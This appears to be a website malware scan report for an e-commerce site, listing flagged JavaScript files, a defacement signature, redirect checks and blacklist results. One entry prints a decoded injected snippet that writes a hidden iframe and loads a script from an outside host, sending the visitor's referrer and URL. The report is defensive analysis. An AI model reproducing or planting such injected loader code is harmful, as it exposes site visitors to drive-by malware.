Scanned pages/files
Request | Server response | Status |
http://brocantic.net/ | 200 OK Content-Length: 169992 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: !--Hacked by -- <!--Hacked by -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="" /> ...[209066 bytes skipped]... | ||
http://brocantic.net/media/system/js/caption.js | 200 OK Content-Length: 3307 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = Antivirus reports:
| ||
http://brocantic.net//modules/mod_ccnewsletter/assets/highslide-with-html.js/ | 404 Not Found Content-Length: 959 Content-Type: text/html | clean |
http://brocantic.net/test404page.js | 404 Not Found Content-Length: 959 Content-Type: text/html | clean |
http://brocantic.net/templates/ja_larix/scripts/ja.script.js | 200 OK Content-Length: 7330 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function(){ var vm_inputs = getElementsByClass ("addtocart_button", null, "INPUT"); var vm_inputs1 = getElementsByClass ("addtocart_button_module", null, "INPUT"); if ((!vm_inputs || !vm_inputs.length) && (!vm_inputs1 || !vm_inputs1.length)) return; for (var i=0; i<vm_inputs.length; i++) { var vm_input = vm_inputs[i]; vm_input.value = ""; } if (!vm_inputs1 || !vm_inputs1.length) return; for (var i= Antivirus reports:
| ||
http://brocantic.net/templates/ja_larix/ja_menus/ja_cssmenu/ja.cssmenu.js | 200 OK Content-Length: 2744 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sfHover = function() { var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li"); for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { clearTimeout(this.timer); if(this.className.indexOf("sfhover") == -1) this.className+="sfhover"; } sfEls[i].onmouseout=function() { this.timer = setTimeout(sfHoverOut.bind(this), 20); } } } function sfHoverOut() { clearTimeout(this.timer); Decoded script: function () { var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li"); for (var i = 0; i < sfEls.length; ++i) { sfEls[i].onmouseover = function () {clearTimeout(this.timer);if (this.className.indexOf("sfhover") == -1) {this.className += "sfhover";}}; sfEls[i].onmouseout = function () {this.timer = setTimeout(sfHoverOut.bind(this), 20);}; } } var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%2 I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.brocantic.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js/mootools&file[1]=mootools-release-1.11.js&subdir[2]=/js/mootools&file[2]=mooPrompt.js | 200 OK Content-Length: 58597 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function loadNewPage( el, url ) { var theEl = $(el); var callback = { success : function(responseText) { theEl.innerHTML = responseText; if( Lightbox ) Lightbox.init(); } } var opt = { method: 'get', onComplete: callback.success } new Ajax( url + '&only_page=1', opt ).request(); } function handleGoToCart() { document.location = live_site + '/index.php?option=com_virtuemart&page=shop.cart& Antivirus reports:
| ||
http://brocantic.net/modules/mod_ja_vmproductslide/ja_vmproductslide/ja.vmproductslide.js | 200 OK Content-Length: 7727 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JS_Slider = new Class({ initialize: function(options) { this.element = this.element || null; this.options = Object.extend({ w: 100, h: 200, num_elem: 4, total: 0, url: '', mode: 'horizontal', direction: 'right', wrapper: 'ja-slide-wrapper', duration: 1000, interval: 3000, auto: 1 },options||{}); Antivirus reports:
| ||
http://brocantic.net/templates/ja_larix/scripts/vm_stuff.js | 200 OK Content-Length: 2288 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- feature_block = document.getElementById('ja-feature'); if (feature_block) { anchors_feature = feature_block.getElementsByTagName('a'); for (i = 0; i<anchors_feature.length; ++i) { if (anchors_feature[i].title.indexOf("Add to Cart") != -1) { anchors_feature[i].className = "addtocart"; } } } carts = document.getElementsByName('addtocart'); if (carts.length) { for (i = 0; i<carts.length; ++i) { carti = Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brocantic.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 10:07:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 Jan 2015 10:07:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: analytics=true; expires=Fri, 15-Jan-2016 10:07:26 GMT; path=/
Set-Cookie: 32b3ca9cf32810a0be2283fe33d67d1f=s9sukp01guk4lbg4ku3k4o6g00; path=/
Set-Cookie: virtuemart=s9sukp01guk4lbg4ku3k4o6g00
Set-Cookie: ja_larix_tpl=ja_larix; expires=Tue, 05-Jan-2016 10:07:26 GMT; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: brocantic.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 10:07:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 Jan 2015 10:07:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: analytics=true; expires=Fri, 15-Jan-2016 10:07:26 GMT; path=/
Set-Cookie: 32b3ca9cf32810a0be2283fe33d67d1f=s9sukp01guk4lbg4ku3k4o6g00; path=/
Set-Cookie: virtuemart=s9sukp01guk4lbg4ku3k4o6g00
Set-Cookie: ja_larix_tpl=ja_larix; expires=Tue, 05-Jan-2016 10:07:26 GMT; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: brocantic.net
Referer: http://www.google.com/search?q=brocantic.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: brocantic.net
Referer: http://www.google.com/search?q=brocantic.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brocantic.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brocantic.net/
Result: brocantic.net is not infected or malware details are not published yet.
Result: brocantic.net is not infected or malware details are not published yet.